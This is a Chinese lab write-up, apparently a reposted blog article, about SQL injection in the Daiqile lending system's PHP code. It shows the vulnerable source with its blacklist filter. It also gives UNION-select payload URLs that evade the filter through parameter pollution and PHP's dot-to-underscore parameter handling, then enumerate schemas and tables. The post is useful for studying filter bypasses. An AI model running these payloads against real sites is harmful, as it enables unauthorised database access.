devbox
空白诗007
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

贷齐乐系统sql注入漏洞_sql注入database()无法使用

作者:空白诗007 | 2024-08-17 04:26:11

sql注入database()无法使用

目录

源码

代码流程

payload编写

全局污染

php小特性

注入思路

payload构造

获取数据库名,这里是不可以使用database的因为括号被过滤乐

在information中查询数据库名

然后获取表名

获取数据

源码

  1. <?php
  2. header("Content-type: text/html; charset=utf-8");
  3. require 'db.inc.php';
  4.   function dhtmlspecialchars($string) {
  5.       if (is_array($string)) {
  6.           foreach ($string as $key => $val) {
  7.               $string[$key] = dhtmlspecialchars($val);
  8.           }
  9.       }
  10.       else {
  11.           $string = str_replace(array('&', '"', '<', '>', '(', ')'), array('&amp;', '&quot;', '&lt;', '&gt;', '(', ')'), $string);
  12.           if (strpos($string, '&amp;#') !== false) {
  13.               $string = preg_replace('/&amp;((#(\d{3,5}|x[a-fA-F0-9]{4}));)/', '&\\1', $string);
  14.           }
  15.       }
  16.       return $string;
  17.   }
  18.   function dowith_sql($str) {
  19.       $check = preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/is', $str);
  20.       if ($check) {
  21.           echo "非法字符!";
  22.           exit();
  23.       }
  24.       return $str;
  25.   }
  26.   foreach ($_REQUEST as $key => $value) {
  27.       $_REQUEST[$key] = dowith_sql($value);
  28. //用空格分割字符串
  29.   $request_uri = explode("?", $_SERVER['REQUEST_URI']);
  30.   //i_d=1&i.d=aaaaa&submit=1
  31.   if (isset($request_uri[1])) {
  32.       $rewrite_url = explode("&", $request_uri[1]);
  33.       //print_r($rewrite_url);exit;
  34.       foreach ($rewrite_url as $key => $value) {
  35.           $_value = explode("=", $value);
  36.           if (isset($_value[1])) {
  37.               //$_REQUEST[I_d]=-1 union select flag users
  38.               $_REQUEST[$_value[0]] = dhtmlspecialchars(addslashes($_value[1]));
  39.           }
  40.       }
  41.   }
  42.  
  43.   if (isset($_REQUEST['submit'])) {
  44.       $user_id = $_REQUEST['i_d'];
  45.       $sql = "select * from ctf.users where id=$user_id";
  46.       $result=mysql_query($sql);
  47.       while($row = mysql_fetch_array($result))
  48.       {
  49.           echo "<tr>";
  50.           echo "<td>" . $row['name'] . "</td>";
  51.           echo "</tr>";
  52.       }
  53.   }
  54. ?>

代码流程

代码先走这里将输入的数据进行过滤

然后往下,用?将代码分割

再往下&继续分割

然后继续往下,用=进行分割

进行判断进入过滤

过滤以下字符

然后再继续往下走,再进行一个查询

payload编写

全局污染

首先php在遇到两个相同名字参数时,php是取后一个的,如下图最终i_d的值为1

php小特性

当参数中出现.的时候会被解析成_,如下图

注入思路

可以使用使用php小特性和全局污染绕过,在这里的时候会将.转换成下划线,然后桡骨第一个waf

然后在这里取值的时候.和_会区分开,然后我们可以在第一个i_d写我们的payload,在i.d写正常数据用来绕过waf

payload构造

这里使用/**/是不想让url编码入库

http://127.0.0.1:9999/daiqile/index.php?submit=aaaaaaaa&i_d=-1/**/union/**/select/**/1,2,3&i.d=123

获取数据库名,这里是不可以使用database的因为括号被过滤乐
http://127.0.0.1:9999/daiqile/index.php?submit=aaaaaaaa&i_d=-1/**/union/**/select/**/1,2,database()&i.d=123

在information中查询数据库名
http://127.0.0.1:9999/daiqile/index.php?submit=aaaaaaaa&i_d=-1/**/union/**/select/**/1,2,schema_name/**/from/**/information_schema.schemata&i.d=123

这里连成一串可以使用limit过滤

http://127.0.0.1:9999/daiqile/index.php?submit=aaaaaaaa&i_d=-1/**/union/**/select/**/1,2,schema_name/**/from/**/information_schema.schemata/**/limit/**/12,1&i.d=123

然后获取表名

这里由于等号被过滤乐所以使用like,然后查表名的时候由于'被过滤所以使用了16进制编码

http://127.0.0.1:9999/daiqile/index.php?submit=aaaaaaaa&i_d=-1/**/union/**/select/**/1,2,table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x637466&i.d=123

再然后获取列名,可以使用limt一个个获取

获取数据

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/空白诗007/article/detail/991176
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号